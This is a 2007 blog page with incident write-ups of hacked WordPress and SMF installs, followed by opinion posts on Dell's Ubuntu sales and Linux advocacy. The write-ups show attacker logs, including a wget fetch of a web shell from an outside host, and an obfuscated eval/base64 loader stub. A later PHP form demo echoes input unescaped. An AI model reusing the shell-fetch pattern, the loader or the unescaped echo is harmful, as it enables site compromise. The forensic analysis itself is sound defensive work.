A few weeks ago we were hit with an SMF v1.1.3 exploit just a few days after the release of v1.1.4. The intruder inserted a slew of hidden spam links into the main ‘index.php’.

It took me a day or two to detect the modification. And in this short time period forums.devside.net, which has been online since 2003, with a healthy Pagerank, had all it’s pages dropped from Google [with the exception of profiles and archives].

It’s a good thing I keep the forums on it’s own sub-domain, which Google treats more like a separate domain than anything else. A SE problem with the sub does not affect the main domain.

As a counter-measure to these “exploit app weakness, get shell, d/l script, profit” type of attacks, I disabled most of the shell related PHP functions.

And so I thought my problems where solved…

This time it’s my fault. I was running WordPress v2.2.2, with v2.2.3 having been released about a month ago. I’ve been checking the WP dashboard, but I must have missed it, or forgotten about it.

This time the intruder exploited one of many WP weaknesses, and inserted some type of a hidden “-1″ post that was nothing more than an attachment to this particular shell-script, executed with URL ‘/blog/?poncheg’…

217.118.81.46 - - [08/Oct/2007:07:10:20 -0400] "GET /wp-includes/js/tinymce/wp-mce-help.php HTTP/1.0" 404 520 "-" "-"
217.118.81.46 - - [08/Oct/2007:07:10:25 -0400] "GET / HTTP/1.0" 200 12071 "-" "-"
217.118.81.46 - - [08/Oct/2007:07:10:35 -0400] "GET /blog/wp-includes/js/tinymce/wp-mce-help.php HTTP/1.0" 200 7665 "-" "-"
217.118.81.46 - - [08/Oct/2007:07:11:01 -0400] "POST /blog/xmlrpc.php HTTP/1.0" 200 4327 "-" "Opera"
217.118.81.46 - - [08/Oct/2007:07:11:49 -0400] "POST /blog/wp-admin/options.php HTTP/1.0" 200 1647 "http://www.devside.net/blog/wp-admin/options.php" "Opera"
217.118.81.46 - - [08/Oct/2007:07:11:56 -0400] "POST /blog/wp-admin/options.php HTTP/1.0" 302 904 "http://www.devside.net/blog/wp-admin/options.php" "Opera"
217.118.81.46 - - [08/Oct/2007:07:11:59 -0400] "POST /blog/wp-admin/upload.php?style=inline&tab=upload&post_id=-1 HTTP/1.0" 200 1554 "http://www.devside.net/
blog/upload.php?style=inline&tab=upload&post_id=-1" "Opera"
217.118.81.46 - - [08/Oct/2007:07:12:14 -0400] "POST /blog/wp-admin/upload.php?style=inline&tab=upload&post_id=-1 HTTP/1.0" 302 509 "http://www.devside.net/b
log/upload.php?style=inline&tab=upload&post_id=-1" "Opera"
217.118.81.46 - - [08/Oct/2007:07:12:25 -0400] "POST /blog/wp-admin/options.php HTTP/1.0" 200 1629 "http://www.devside.net/blog/wp-admin/options.php" "Opera"
217.118.81.46 - - [08/Oct/2007:07:12:30 -0400] "POST /blog/wp-admin/options.php HTTP/1.0" 302 904 "http://www.devside.net/blog/wp-admin/options.php" "Opera"
217.118.81.46 - - [08/Oct/2007:07:12:33 -0400] "GET /blog/wp-admin/upgrade.php?step=1 HTTP/1.0" 200 1446 "-" "-"
...
82.103.135.182 - - [08/Oct/2007:07:12:48 -0400] "GET /blog/?poncheg HTTP/1.0" 200 4789 "-" "Opera/9.22 (Windows NT 5.1; U; ru)"
...

whois 217.118.81.46
JSC "VimpelCom" WLAN1 Moscow
 
resolveip 82.103.135.182
Host name of 82.103.135.182 is vps206.fastvps.ru

Luckily, in addition to the disabled PHP functions, I also had all my file/dir permissions under WP locked down, so it does not look like anything was modified. I still recreated the entire WP directory, just for safety sakes, and had to manually go into the database and delete the hidden attachment/post.

It’s not a matter of if you are going to get hacked, it’s a matter of when. So keep those web apps patched!

Share This

1
2
3
4
5
6
7
8
9
10

--09:57:23--  http://kotzilla.jino-net.ru/include.txt
           => `include.txt'
Resolving kotzilla.jino-net.ru... 217.107.217.29
Connecting to kotzilla.jino-net.ru|217.107.217.29|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 44,348 (43K) [text/plain]
 
    0K .......... .......... .......... .......... ...       100%   69.60 KB/s
 
09:57:25 (69.60 KB/s) - `include.txt' saved [44348/44348]

For those that do not know, the above translates to using wget, or the equivalent, to download a script to your system. With all this being done via Apache and usually from a simple URL designed to exploit a weakness in the given application.

My journey starts here.

Step 1.

1

find / -name include.txt

Nothing. Intruder must have deleted or renamed it.

Step 2.
Check http://kotzilla.jino-net.ru/include.txt for clues.

1
2
3
4
5
6
7

<?PHP
             //Authentication
$login = ""; //Login
$pass = "";  //Pass
$md5_pass = ""; //If no pass then hash
eval(gzinflate(base64_decode('HJ3HkqN..[removed]..f/79z/8A')));
?>

Intruder must think this is clever. Once you decode and inflate the string, it returns…

1

eval(gzinflate(base64_decode('[another string to decode and inflate]')));

Step 3.
We do not want to execute any PHP code that is an unknown. The only option left is to write a PHP script to decode/inflate until we get at the center…

1
2
3
4
5
6
7
8
9
10
11
12

<?php
$string = "eval(gzinflate(base64_decode('HJ3HkqN..[removed]..f/79z/8A')));";
$pattern = '/^eval\(gzinflate\(base64_decode\('([^'\);]*)/';
$count = 0;
while (preg_match($pattern, $string, $matches) )
{
$count++;
$string = gzinflate(base64_decode($matches[1]));
}
echo "Decoded/Inflated:$count\n";
echo "$string";
?>

Seems to be some type of a web php shell script called C99madShell.

Step 4.
We need to locate the downloaded script…

1

find / -name '*.php' | xargs grep 'eval(gzinflate(base64_decode('

1

/.../forums.devside.net/Themes/readme.php:eval(gzinflate(base64_decode('HJ3Hkq...

Not good!

Step 5.
Check logs.

1

grep 'readme.php' /.../forums.devside.net/access_log

Intruder was up to something no good.

1
2
3
4
5

149.156.204.1 - - [26/Sep/2007:09:57:38 -0400] "GET /Themes/readme.php HTTP/1.1" 200 4374 "-" "Opera/9.21 (Windows NT 5.1; U; ru)"
149.156.204.1 - - [26/Sep/2007:09:58:00 -0400] "POST /Themes/readme.php HTTP/1.1" 200 3501 "http://forums.devside.net/Themes/readme.php" "Opera/9.21 (Windows NT 5.1; U; ru)"
149.156.204.1 - - [27/Sep/2007:13:08:03 -0400] "GET /Themes/readme.php HTTP/1.1" 200 4366 "-" "GoogleBotv2"
149.156.204.1 - - [27/Sep/2007:13:09:24 -0400] "POST /Themes/readme.php HTTP/1.1" 200 4980 "http://forums.devside.net/Themes/readme.php" "GoogleBotv2"
...

Final Analysis.
I’ve search the logs, and I cannot locate anything helpful about the exploit. It does not seem to be an exploit in a URL, maybe POST related, or has something to do with the SMF theme function. I run no mods, and use the default theme, and do not allow users to switch themes.

The latest SMF 1.1.4 changelog does not state anything about fixed exploits.

I know the IP of the intruder [I’m sure just a hijacked system], the user_id on the forum, the mail account used for activation, but not much anything else.

1
2

resolveip 149.156.204.1
Host name of 149.156.204.1 is nzs.agh.edu.pl

1
2

149.156.204.1 - - [26/Sep/2007:09:52:58 -0400] "GET /index.php?action=activate;u=1992;code=136bd7eb0f HTTP/1.1" 200 3409 "http://www.qcsalabama.com/mail/src/
read_body.php?mailbox=INBOX&passed_id=685&startMessage=1" "Opera/9.21 (Windows NT 5.1; U; ru)"

Checking the forum account, I see this user has also logged in via another IP [and this might be where the exploit starts]…

1
2
3
4
5
6
7

83.219.135.75 - - [26/Sep/2007:09:48:07 -0400] "GET /index.php?action=register HTTP/1.1" 200 5961 "http://www.google.com/search?num=100&hl=en&lr=&as_qdr=all&
q=+%22powered+by+smf+1.1.3%22+site%3Anet&btnG=Search" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7"
...
83.219.135.75 - - [26/Sep/2007:09:57:07 -0400] "POST //index.php?action=login2 HTTP/1.1" 302 851 "-" "Mozilla/4.0 (compatible; Windows 5.1)"
83.219.135.75 - - [26/Sep/2007:09:57:09 -0400] "POST /index.php?action=post2; HTTP/1.1" 200 375 "-" "Mozilla/4.0 (compatible; Windows 5.1)"
83.219.135.75 - - [26/Sep/2007:09:57:11 -0400] "POST /index.php?action=post2; HTTP/1.1" 200 1527 "-" "Mozilla/4.0 (compatible; Windows 5.1)"
83.219.135.75 - - [26/Sep/2007:09:57:23 -0400] "POST /index.php?action=post2; HTTP/1.1" 200 307 "-" "Mozilla/4.0 (compatible; Windows 5.1)"

1
2

resolveip 83.219.135.75
Host name of 83.219.135.75 is ppp135-75.tis-dialog.ru

I can understand phpBB getting rooted, I can understand WordPress being owned, but this is a first one for SMF.

And for anyone having odd issues with SMF [like getting stuck on ‘fetching preview…’]…

Smile. All your SMF forums have been hacked. Have a nice day.

Search ‘fetching preview’ on the SMF support forums. This hack/exploit might be going back years.

Share This

And I’m not even going to write anything.

Why the Dell/Ubuntu Deal Won’t Improve Linux’s Market Share

When you take a few steps back from the furor and zealotry and take a close look at what’s happened here, you will quickly start to see the cracks. One problem is that Dell appears to be under the misguided impression that listening to the IdeaStorm community is the same as listening to customers. It’s not. Anyone can register and become an instant member of the IdeaStorm community. What Dell listened to wasn’t a cross-section of customers, but rather a pressure group.

There are a series of other pressure groups in operation on IdeaStorm right now, people who are putting their own agendas on the table and expecting Dell to carry them out…

A wise and sound analysis that iterates everything mentioned here on the topic.

Share This

World to Dell: We want desktop Linux!

Unless you’ve been living in a cave, you’ve probably heard the news:

The world wants Linux. And as we all know, the news can’t be wrong. Especially if it’s regurgitated over and over again on every tech site on the net.

Just one problem though…

This is Linux-fever journalism at its worst, and an example of a simple lie being easier for people to swallow than the complex truth.

Now I want you to take a deep breath at this point, because you’re about the get a sick feeling in your stomach. That feeling of utter hopelessness. And it’s going to come in shock waves, one after the other, over and over.

[You might want to stop reading at this point.]

Tsunami Wave #1.

And on Dell’s Ideastorm Web site, a staggering 41,210 users agreed with the thread, “Sell Linux PCs Worldwide — not only the United States”.

On another thread, 6,410 users agreed with the statement, “Make Dell Ubuntu PCs available to businesses and non-profits”.

They can’t even get the basic facts right…

When you vote on Dell’s IdeaStorm, your vote increases the total count by 10 points.

The reported figures so eminently talked about since day 1 are off by a factor of 10. That’s for every reported 10,000 users, only 1,000 votes were cast.

But don’t just stop there… Take into consideration that you get to register with a made up user name and password immediately, with no email confirmation or validation. You don’t even leave the page, thanks to JavaScript.

Log out, re-register again under the same exact IP address, and you get to vote once more, over and over.

The reported 100,000 users that started this mess in the first place on IdeaStorm, are at best 10,000 strong — assuming no manipulation was involved.

Not that the people doing the actual voting have any intention of getting a Ubuntu DELL anyways…

[While this quote is a joke, it sums up things quite nicely.]

I voted multiple times for Ubuntu on Dell’s ideaStorm so that others can have the opportunity to purchase it. As an Ubuntu advocate, I’ve done my part. It’s time for the consumers to do their part. Don’t blame me if consumers are too stupid to know what is best for them.

Tsunami Wave #2.

Dell has no intention of delivering Linux to the home user.

OEMs like Dell have razor thin margins. They live and die by the volume discounts, co-marketing funds, “Desktop Real Estate”, and leads provided by Microsoft.

The Ubuntu systems that Dell sells are nothing more than a type of a loss-leader designed to show the consumer that they are getting a better deal when buying the Windows counter-part… More features to select from, better promotions/deals, better components/upgrades, and sometimes cheaper upgrades.

If you’re part of the vast digg.com crowd that believes the US government perpetrated the 9/11 attacks, you’re probably also the type to believe that Dell will jeopardize its Microsoft relationship, and face the consequences, to sell an expected 20,000 Ubuntu systems [at a loss].

You don’t bite the hand that feeds you.

What’s Dell’s incentive here?… To generate publicity to further sell Windows Licenses and provide Microsoft with facts and figures to use in future campaigns.

More OEMs are cashing in on this profitable tactic every day.

Tsunami Wave #3.

By *pushing* Linux upon users that have no need for it, you are setting yourself up for failure.

The Microsoft Windows installed base is soon to cross the 1 Billion mark.

That user-base is very diverse: with different cultures, languages, and processes. Take into account everything Microsoft has had to work through by catering to everyones needs. Major roadblocks have been overcome. And what has Linux been put through on the Desktop? Relatively speaking… absolutely nothing.

Linux does not have a secret formula that makes it immune to growing pains. Switch the market share between Windows and Linux, and Linux will be downright unusable. From viruses, to backward compatibility issues, to UI problems, to everything else.

Let me state it one more time since it’s a point never mentioned: With an increasing market share, Linux will have the same exact growing pains and problems as Microsoft did and currently has.

Not to even mention that you are now catering to a mass that thinks the CD tray is a cup holder and the mouse is a foot pedal.

Landslide #1.

Vista Aiding Linux Desktop, Strategist Says

“Windows Vista has probably created the single biggest opportunity for the Linux desktop to take market share…”

How ofter do I hear this delusional statement in all it’s variations.

Vista has problems. So did Windows XP. As did Windows 2000. And 98, 95, 3.1. There _is_ a pattern here. Its called SP1 [Service Pack 1]. After which every version mentioned took off.

The saying goes: if your first version is not horribly broken, you’ve waited too long to release it.

The current release of Vista has allowed Microsoft to get feedback from a very diverse user-base. Feedback that is priceless, that cannot be had any other way. How else is progress made?

You don’t raise your child in a plastic bubble.

History repeats itself, and just as Linux has not been able to make it to the Desktop since the promised year 2000, Windows users are also not migrating to Linux pastures in mythical herds. If anything, XP sales are up and Microsoft is readying to sell millions of Vista Licenses, of which an estimated 6 million are being sold each month.

Tell me I’m wrong.

Share This

1) Create a completely misleading title.

2) Make a mountain out of a molehill.

3) Proclaim insider knowledge not possessed by more experienced individuals.

4) Carefully craft statements based on false premisses.

5) Spread the FUD around and bake @ 350.

And whatever you do, DO NOT ADD FACTS, Facts, facts!

Share This

The typical day revolves around crying wolf, proclaiming Linux the winner of every battle, and screaming FUD at anything and everything Microsoft related.

It’s almost like watching under-developed, spoiled children running around, screaming, constantly trying to evoke attention and reassurance within their group.

Paris Hilton, and friends, come to mind here.

Lets take a look at the current round of FUD [Fear, Uncertainty, and Doubt]…

Tactic #1.

Virtualize Windows on Linux? Microsoft Says No Way!

Create a completely misleading title.

Microsoft made no such statements…

“We haven’t seen significant demand [from enterprise-level customers] for Linux applications on the desktop or for desktop virtualization on top of Linux,” — Sam Ramji, Director Platform Technology Strategy, Microsoft

No demand for Windows virtualization under Linux from enterprise-level customers does not translate to anything remotely close to what the author will have you believe.

Tactic #2.

However, one has to wonder why Microsoft is blowing off the enthusiast community…

Make a mountain out of a non-existent molehill.

The referred to community is not the type that goes out and buys a copy of Windows to run under Linux. They violate the EULA terms of existing copies, or simply result to pirating a fresh virus and backdoor infected copy of the OS from The Pirate Bay.

Microsoft is in business to make money, and will allocate resources to the market where there are profits to be made. Pleasing a community that never buys anything, that spits on them, provides no benefit and drains resources better focused elsewhere.

Tactic #3.

I think the decision to refuse to support virtualized Vista and XP on Linux will hurt Microsoft in both the short and long term.

Proclamation of knowledge not possessed by others.

Microsoft is not run by morons. Talent is everywhere, and not just at Google.

Again, the author does not clarify what “support” is referring to exactly, but if there was a decision made, you can be sure that more knowledgeable and experienced persons have worked it out.

Tactic #4.

I like Windows Vista (and XP), but I want to use Linux, too. And, I want to run the operating systems I prefer the way I want to. Microsoft’s decision to refuse to support virtualization on Linux makes it harder for me to do things the way I want - and I’m not happy. By refusing to support virtualization on Linux, Microsoft is basically telling users, “it’s our way or the highway.”

Carefully craft statements based on false premisses… Leaving just enough room to backpedal out of certain assertions in the future.

You can run just about any version of Windows as a guest OS under a Linux or Debain based host with VMWare, Xen, QEMU, etc. Paid customers are provided support from the VM vendor.

Tactic #5.

Somebody needs to remind Microsoft that it’s no longer alone on the desktop - and it can’t bully users like it used to. Somebody (namely me) just did. Is anybody in Redmond listening?

Pretend you have fallen, and can’t get up. Your target has pushed you down the stairs. Threaten to sue!

Please clarify what exactly it is that you believe Microsoft owes you?

It’s not enough that you get to steal their products, but now they also need to provide support for you to run Windows under Linux.

Remember what I said about the problems of having to cater to the vocal sub-category of the Linux home user-base? They never stop complaining, no matter what you do. Ubuntu comes to mind here.

The OS is a tool to be used, not a way of life.

Share This

One particular thread caught my attention:
Ubuntu Dell is $50 Less Than Windows Dell — Implemented.

Lets take The Flavor Challenge and build two same-spec 1420 Notebooks:

Note “Jet Black [Included in Price]” on 1420 Ubuntu
Downgrade to “Jet Black [subtract $20]” on 1420 Vista

Note “FREE! 2GB Shared Dual Channel DDR2 at 667MHz [Included in Price]” on 1420 Vista
Upgrade to “2GB Shared Dual Channel DDR2 at 667MHz [add $150]” on 1420 Ubuntu

Note “FREE! 160GB SATA Hard Drive (5400RPM) [Included in Price]” on 1420 Vista
Upgrade to “Size: 160GB SATA Hard Drive (5400RPM) [add $125]” on 1420 Ubuntu

Note “Intel 3945 802.11a/g Mini-card [Included in Price]” on 1420 Ubuntu
Upgrade to “Intel 3945 802.11a/g Mini-card [add $25]” on 1420 Vista

Total:

Inspiron 1420 [Vista] $824
Inspiron 1420N [Ubuntu] $1,049

The people asked, and Dell delivered! And only at $225 more for the Ubuntu offering.

Say this with me: Dell has no intention of selling non-Windows consumer and commodity PCs/Notebooks. They simply can’t as the net profit on a Dell system is derived directly from the Windows OS via “Desktop Real Estate” and any Microsoft leads and co-marketing funds [kickbacks] provided — and not from the base hardware.

The Linux community is being used to generate free publicity and in turn sell Windows Licenses.

A bit ironic, don’t you think so?

Update 07/11/07:

The given components and prices on the 1420 Notebook have been updated. The price difference is now $25 [assuming no change in Wireless NIC], in favor of the Ubuntu system.

Among frequent price and component discrepancies, price fluctuations, and Windows favored promotions, I’m not sure if Dell is serious about selling “open-source” [as Dell calls them] systems, rather than generating publicity.

Considering that expected sales are at 1% of total systems shipped, and that Microsoft could break Dell in half by decreasing the received Windows License discounts and co-marketing funds, I have no choice but to assume the latter.

Share This

We know that the net margin for Dell, as a whole, is around 5% [the true profit made on revenue]. While we can compare this number to the industry standard, it does not tell us anything about the margins Dell pockets on its commodity PC and Notebook lines.

Per system, it is rumored to be around 2% or less and to be razor-thin and ever decreasing.

Considering that Dell pays $25-$45 per OEM volume XP/Vista license and profits $45+ from the “Desktop Real Estate” provided by Windows, where is the profit made when a Ubuntu system is priced less than it’s Windows counterpart?

Surely not with the upgrades that are either lacking or similarly priced [that sometimes cost more].

Publicity.

The profits made on selling Ubuntu systems at cost, or even at a loss, is with the free publicity Dell is generating for itself via major news and social network sites around the net regurgitating on this deal literally every few days. This in turn generates traffic and sales on profitable items, such as the Windows systems, for Dell.

Share This

Just don’t get too excited, because this is old news [circa 2004]. And something that is currently being rehashed as new on Digg, Slashdot, and Linux sites…

I’m sure you have seen it too: the news along the lines of “[insert random OEM here] releasing incredible Linux offers”, quickly followed by naive comments proclaiming the end of Microsoft.

The fact is, OEMs and companies like Wal-Mart have been attempting to sell Linux based PCs and Laptops/Notebooks for years. Take a look:

• Sept. 14, 1999 Is the IBM Thinkpad now Linux-friendly?
• Spring 2000 Dell Delivers Linux! [Archive.org]
• June 17, 2002 Wal-Mart trims prices of Linux-based PCs
• May 12, 2003 HP “people’s notebook” runs Linux
• July 22, 2004 Toshiba Windows media laptop plays with embedded Linux

Unfortunately, most of these attempts have resulted in complete failure or extremely small volume [Wal-Mart couldn’t even sell 1000 of those Laptops]. And every few years, the waters are tested again, with the same exact outcome.

Lets face the truth: Linux does not work for the average consumer, it never has, as “choice” is not something that consumers are looking for. Familiarity, function, and eye candy are the determining factors here.

As “Linux” is not synonymous with “Wal-Mart”; it neither is with “Desktop.”

See more for yourself at the Google News Archives and here.

Share This

When you have a form with one or more buttons, hitting enter under Firefox will POST the value of the 1st form button. On the other hand, with IE, unless a specific button was selected, no button values will POST.

At this point, I know a lot of people would start claiming that Microsoft is sloppy, IE is brain dead, Firefox is so much better, and more similar tripe… But think about it, how should the browser know which button is “first”? Should it be the 1st one in the HTML code? Should the “tabindex” value affect the situation? Could something be manipulating the button visibility or placement under CSS or JavaScript? Can the true human-interpreted layout even be determined by code?

And what about the question of whether the ‘enter’ key signifies “submit form”, or “submit form and the 1st button value”?

Windows has been deployed on hundreds of millions of systems, if not more. The user-base is very diverse: with different cultures, languages, and processes. If you want to cater to that user-base, you cannot make assumptions. IE is absolutely correct in not POSTing the value of an unselected form button on an ‘enter’ key press.

And this does not even touch on the fact that when you have 100s of millions of users, you also absolutely have to consider backward compatibility. Who knows how this used to work in the past, or what assumptions coders have made.

As is turns out, this really is a feature after all. And chances are, the rest of what the Linux fan-base complains about with Microsoft falls exactly along these lines. I’m all for GNU/Linux, just not mindless accusations and false claims.

submit.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
	"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>It's not a bug, it's a feature!</title>
</head>
<body>
<form action="submit.php" method="post" name="form" id="form">
 
<p><?php
if (isset($_POST['action'])) {
	if (isset($_POST['submit_1'])) echo $_POST['submit_1'] . '<br/>';
	if (isset($_POST['submit_2'])) echo $_POST['submit_2'] . '<br/>';
}
?></p>
 
<div>
	<input type="text" name="text" id="text" tabindex="1" value="" /><br/>
 
	<input type="submit" name="submit_1" id="submit_1" tabindex="2" value="Button 1 Clicked" />
	<input type="submit" name="submit_2" id="submit_2" tabindex="3" value="Button 2 Clicked" />
 
	<input type="hidden" name="action" value="submitted" />
</div>
</form>
</body>
</html>

Share This